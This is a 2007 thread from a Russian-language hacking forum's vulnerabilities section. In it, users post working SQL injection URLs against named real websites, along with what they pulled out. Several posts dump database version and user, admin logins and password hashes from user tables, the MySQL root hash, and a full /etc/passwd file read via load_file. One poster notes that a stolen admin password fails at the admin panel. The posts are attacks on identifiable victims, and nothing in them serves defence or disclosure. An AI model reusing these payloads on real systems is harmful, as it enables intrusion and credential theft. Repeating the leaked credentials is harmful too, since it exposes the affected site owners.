ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #3491  
Старый 01.11.2007, 00:04
K1nD[e]R
Участник форума
Регистрация: 16.06.2007
Сообщений: 133
Провел на форуме:
1877761

Репутация: 237
Отправить сообщение для K1nD[e]R с помощью ICQ
По умолчанию

Код:
http://www.ecom-info.spb.ru/indicators/print.php?id=-428+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,concat(version(),user(),database()),system_user(),16,17,18,19,20,21,22,23,24,25,26/*
 
Ответить с цитированием

  #3492  
Старый 01.11.2007, 00:07
JIyka
Новичок
Регистрация: 31.10.2007
Сообщений: 18
Провел на форуме:
165018

Репутация: 25
Отправить сообщение для JIyka с помощью ICQ
По умолчанию

http://www.widgetmonkey.com/detail.php?id=-1+union+select+1,user(),3,4,database()/*
 
Ответить с цитированием

  #3493  
Старый 01.11.2007, 00:14
ElteRUS
Постоянный
Регистрация: 11.10.2007
Сообщений: 406
Провел на форуме:
7215020

Репутация: 1423
По умолчанию

http://www.murom.ru/article.php?sid=-1+union+select+1,2,3,4,5,6,7,8,9,concat_ws(0x2f,ve rsion(),database(),user()),11,12/*

4.0.24-log/nuke/show@localhost

----------------------------------------------------------------------

http://www.olimp.chita.ru/photos.php?upid=-1+union+select+1,2,3,concat_ws(0x2F,version(),data base(),user()),5,6,7,8,9,10/*

5.0.27/m$olymp/m$olymp@localhost



http://www.olimp.chita.ru/photos.php?upid=-1+union+select+1,2,3,concat_ws(0x2F,username,passw ord),5,6,7,8,9,10+from+auth_user/*

логин\пас не хеш.
 
Ответить с цитированием

  #3494  
Старый 01.11.2007, 00:14
K1nD[e]R
Участник форума
Регистрация: 16.06.2007
Сообщений: 133
Провел на форуме:
1877761

Репутация: 237
Отправить сообщение для K1nD[e]R с помощью ICQ
По умолчанию

Код:
http://www.nlr.ru/news/vid_news.php?id=-723+union+select+1,2,3,load_file('etc/passwd'),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35/*
 
Ответить с цитированием

  #3495  
Старый 01.11.2007, 00:21
K1nD[e]R
Участник форума
Регистрация: 16.06.2007
Сообщений: 133
Провел на форуме:
1877761

Репутация: 237
Отправить сообщение для K1nD[e]R с помощью ICQ
По умолчанию

Код:
http://www.big6.com/showarticle.php?id=-415+union+select+concat(user(),version(),database()),2,3,4,5/*
big6@localhost
 
Ответить с цитированием

  #3496  
Старый 01.11.2007, 00:30
ElteRUS
Постоянный
Регистрация: 11.10.2007
Сообщений: 406
Провел на форуме:
7215020

Репутация: 1423
По умолчанию

ekaterininskiy.ru

http://www.ekaterininskiy.ru/index.php?page=catalog&top=-1+union+select+concat_ws(0x2F,version(),database() ,user()),2/*

5.0.41-log/ekaterininskiy/ekaterininskiy@cub.mplik.ru



http://www.ekaterininskiy.ru/index.php?page=catalog&top=-1+union+select+1,concat_ws(0x2F,login,password)+fr om+users/*

логин/хеш



http://www.ekaterininskiy.ru/index.php?page=catalog&top=-1+union+select+1,concat_ws(0x2F,login,password)+fr om+ekat_admin/*

admin/5f4dcc3b5aa765d61d8327deb882cf99
 
Ответить с цитированием

  #3497  
Старый 01.11.2007, 00:30
K1nD[e]R
Участник форума
Регистрация: 16.06.2007
Сообщений: 133
Провел на форуме:
1877761

Репутация: 237
Отправить сообщение для K1nD[e]R с помощью ICQ
По умолчанию

Код:
http://www.abandoned.ru/pic.php?id=-363+union+select+1,2,3,concat(user(),version()),5,6/*
uryevich@localhost:4.0.18
 
Ответить с цитированием

  #3498  
Старый 01.11.2007, 01:15
Xszz
Участник форума
Регистрация: 23.04.2007
Сообщений: 233
Провел на форуме:
671223

Репутация: 91
Отправить сообщение для Xszz с помощью ICQ
По умолчанию

Код:
http://www.3d02.com/html_Gallery/gallery_still_image.asp?id=1536+or+1=(SELECT+TOP+1+cast(user+as+nvarchar)%2B%27%3A%27%2Bcast(password+as+nvarchar)+from+Admin)--
Логин пароль Админа
http://www.3d02.com/admin
Но почему-то не подходит
 
Ответить с цитированием

  #3499  
Старый 01.11.2007, 03:24
ЛифчиС5СВ
Постоянный
Регистрация: 09.03.2007
Сообщений: 323
Провел на форуме:
1552920

Репутация: 369
По умолчанию

Привед БанкокчеГи
Bangkok's Independent Newspaper
Код:
http://www.nationmultimedia.com/qvote/view_poll.php?page=12&pid=900+union+select+1,2
Не подобрал, но очень удобно говорят, что кол-во столбцов неверное, и на таком-то сайте! Красотища! = )
> 10 столбцов.
 
Ответить с цитированием

  #3500  
Старый 01.11.2007, 03:49
-MoLoToK-
Познающий
Регистрация: 04.10.2007
Сообщений: 32
Провел на форуме:
188171

Репутация: 88
Отправить сообщение для -MoLoToK- с помощью ICQ
По умолчанию

Цитата:
Сообщение от ЛифчиС5СВ  
Привед БанкокчеГи
Bangkok's Independent Newspaper
Код:
http://www.nationmultimedia.com/qvote/view_poll.php?page=12&pid=900+union+select+1,2
Не подобрал, но очень удобно говорят, что кол-во столбцов неверное, и на таком-то сайте! Красотища! = )
> 10 столбцов.
вроде так и есть 2 столбца
Код:
http://www.nationmultimedia.com/qvote/view_poll.php?page=12&pid=-1+union+select+1,convert(concat(user(),0x3a,database(),0x2a,version()),binary)/*
выводит версию,DB,юзера
Оба таблица mysql.user
Код:
http://www.nationmultimedia.com/qvote/view_poll.php?page=12&pid=-1+union+select+1,convert(concat(user,0x3a,password),binary)+from+mysql.user/*
root:6b21310545272925
Код:
http://www.nationmultimedia.com/qvote/view_poll.php?page=12&pid=-1+union+select+1,convert(concat(load_file(0x2f6574632f706173737764)),binary)+from+mysql.user/*
root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin news:x:9:13:news:/etc/news: uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0perator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin gopher:x:13:30:gopher:/var/gopher:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin dbus:x:81:81:System message bus:/:/sbin/nologin vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin nscd:x:28:28:NSCD Daemon:/:/sbin/nologin rpm:x:37:37::/var/lib/rpm:/sbin/nologin haldaemon:x:68:68:HAL daemon:/:/sbin/nologin netdump:x:34:34:Network Crash Dump user:/var/crash:/bin/bash sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin rpc:x:32:32:Portmapper RPC user:/:/sbin/nologin rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin nfsnobody:x:4294967294:4294967294:Anonymous NFS User:/var/lib/nfs:/sbin/nologin mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin pcap:x:77:77::/var/arpwatch:/sbin/nologin apache:x:48:48:Apache:/var/www:/sbin/nologin webalizer:x:67:67:Webalizer:/var/www/usage:/sbin/nologin xfs:x:43:43:X Font Server:/etc/X11/fs:/sbin/nologin ntp:x:38:38::/etc/ntp:/sbin/nologin gdm:x:42:42::/var/gdm:/sbin/nologin mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash hpsmh:x:79:79::/hpsmh:/sbin/nologin ftpnation:x:500:50:ftp user:/content:/bin/bash tee:x:501:501::/home/tee:/bin/bash njrooms:x:502:100::/content2/njrooms:/bin/bash nes:x:503:100::/content2/nes:/bin/bash worldfilmbkk:x:504:100::/content2/worldfilmbkk:/bin/bash njconnex:x:505:100::/content2/njconnex:/bin/bash internet:x:506:50:k nim request add:/content/images_news:/bin/bash slideshow:x:507:50:ftp user:/content/slideshow:/bin/bash

Последний раз редактировалось -MoLoToK-; 01.11.2007 в 04:08..
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ